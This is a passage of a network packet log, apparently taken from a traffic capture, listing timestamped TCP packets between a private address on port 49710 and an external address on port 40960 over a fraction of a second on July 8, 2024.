                            Jul 8, 2024 10:09:18.356314898 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.356337070 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.356362104 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.356368065 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356383085 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356393099 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356404066 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356412888 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356419086 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.356430054 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.356452942 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.356508970 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356518984 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356537104 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356555939 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.356573105 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.356579065 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356600046 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356609106 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356663942 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356714010 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356724024 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356734037 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356750011 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356756926 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356796026 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356805086 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356808901 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356822014 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356842041 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356893063 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356901884 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356911898 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.356997013 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357243061 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357253075 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357261896 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357271910 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357290030 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357299089 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357309103 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357319117 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357330084 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357366085 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357376099 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357393026 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.357395887 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357405901 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357418060 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357428074 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.357429981 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357446909 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.357450008 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357466936 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357470989 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.357484102 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.357487917 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357510090 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.357537031 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.357585907 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357595921 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357609987 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357630968 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357634068 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.357640982 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357647896 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.357667923 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.357686043 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357692003 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.357697010 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357729912 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.357738972 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357758045 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357767105 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357774973 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.357779980 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357798100 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357806921 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357809067 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.357831955 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357889891 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357899904 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357913017 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357952118 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357961893 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.357973099 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363105059 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363116026 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363126040 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363143921 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363152981 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363162994 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363173008 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363183975 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363193035 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363212109 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363221884 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363231897 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363241911 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363250971 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363260984 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363276005 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363286972 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363327026 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363430977 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.363480091 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363491058 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363501072 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363511086 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363526106 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.363537073 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.363554001 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.363632917 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363642931 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363652945 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363682985 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.363693953 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.363758087 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363769054 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363785982 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363795042 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363801003 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.363806963 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363818884 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.363828897 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.363861084 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.363897085 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363908052 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363924026 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.363938093 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.363954067 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.364042044 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364052057 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364063978 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364084005 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.364098072 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.364175081 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364186049 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364197016 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364206076 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364303112 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364311934 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364321947 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364335060 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364343882 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364353895 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364363909 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364372969 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364471912 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364486933 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364500046 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364509106 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364520073 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364530087 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364538908 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364551067 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364559889 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364638090 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364648104 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364658117 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364666939 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364676952 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364686012 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364695072 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364705086 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364716053 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364725113 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364733934 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364969969 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364979982 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.364990950 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.365144014 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.373363018 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373373985 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373383999 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373394012 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373404980 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373419046 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.373425007 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373437881 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373449087 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373450994 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.373460054 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.373461008 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373471022 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373480082 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373488903 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.373491049 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373502016 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.373502016 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373518944 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373534918 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373542070 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373548031 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373553038 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373558998 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373564005 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373574972 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373579979 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373584986 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373590946 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373594999 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373599052 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373604059 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373608112 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373610020 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373610973 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373611927 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373615980 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373617887 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373620033 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373631954 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373641014 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373651028 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373660088 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373670101 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373680115 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373689890 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373698950 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373708963 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373718023 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373727083 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373735905 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373747110 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373756886 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373766899 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373775959 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373785973 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373795033 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373807907 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373816967 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373836994 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373847008 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373857021 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373866081 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373876095 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373897076 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373907089 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373917103 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373970985 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.373980999 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.373987913 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374003887 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374013901 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374026060 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.374027967 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374038935 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374049902 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374058962 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374068975 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374088049 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374097109 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374105930 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374115944 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374125004 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374135017 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374145031 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374155045 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374164104 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374172926 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374191999 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374195099 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374196053 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374197960 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374201059 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374203920 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374218941 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374228954 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374238968 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374248028 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374258041 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374267101 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374277115 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.374286890 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.381638050 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.381649971 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.381769896 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.381779909 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.381789923 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.381889105 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.381906033 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.381911039 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.381922007 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.381931067 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382035971 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382045984 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382148981 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382158995 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382163048 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382167101 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382172108 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382181883 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382195950 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382263899 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382273912 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382288933 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382297993 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382309914 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382370949 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.382410049 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382421017 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382430077 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382436991 CEST4971040960192.168.2.12185.215.113.67
                            Jul 8, 2024 10:09:18.382441998 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382558107 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382575989 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382586956 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382702112 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382710934 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382723093 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382733107 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382744074 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382752895 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382761955 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382771969 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382781982 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382817030 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382826090 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382837057 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382847071 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382858038 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382869005 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382878065 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382986069 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.382996082 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383007050 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383016109 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383025885 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383126974 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383137941 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383147001 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383157969 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383167028 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383176088 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383276939 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383286953 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383296013 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383409977 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383420944 CEST4096049710185.215.113.67192.168.2.12
                            Jul 8, 2024 10:09:18.383430958 CEST4096049710185.215.113.67192.168.2.12
